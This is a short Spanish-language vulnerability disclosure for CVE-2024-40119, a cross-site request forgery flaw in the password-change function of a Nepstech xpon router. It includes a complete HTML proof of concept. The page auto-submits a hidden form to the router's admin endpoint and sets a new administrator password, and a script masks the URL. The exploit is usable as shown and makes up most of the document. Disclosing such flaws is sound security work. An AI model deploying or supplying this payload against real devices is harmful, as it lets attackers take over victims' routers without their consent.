
Vulnerabilidad de Cross-Site Request Forgery (CSRF) en la función de cambio de contraseña, que permite a atacantes remotos cambiar la contraseña de administrador sin el consentimiento del usuario, lo que conduce a una posible toma de control de la cuenta.
Subhodeep Baroi
CVE-2024-40119 es una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el enrutador WiFi Nepstech xpon NTPL-XPON1GFEVN v1.0 con firmware v2.0.1. Esta vulnerabilidad permite a atacantes remotos cambiar la contraseña de administrador sin el consentimiento del usuario, lo que lleva a una posible toma de control de la cuenta.
Un atacante remoto puede crear una página HTML maliciosa que active la funcionalidad de cambio de contraseña cuando un usuario autenticado la visite. A continuación se muestra un vector de ataque de ejemplo:
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
<input type="hidden" name="name0" value="admin" />
<input type="hidden" name="name1" value="user" />
<input type="hidden" name="name2" value="user3" />
<input type="hidden" name="oldUsername" value="admin" />
<input type="hidden" name="newUsername" value="" />
<input type="hidden" name="oldPassword" value="" />
<input type="hidden" name="newPassword" value="UserUser2@" />
<input type="hidden" name="cfmPassword" value="UserUser2@" />
<input type="hidden" name="accountflg" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>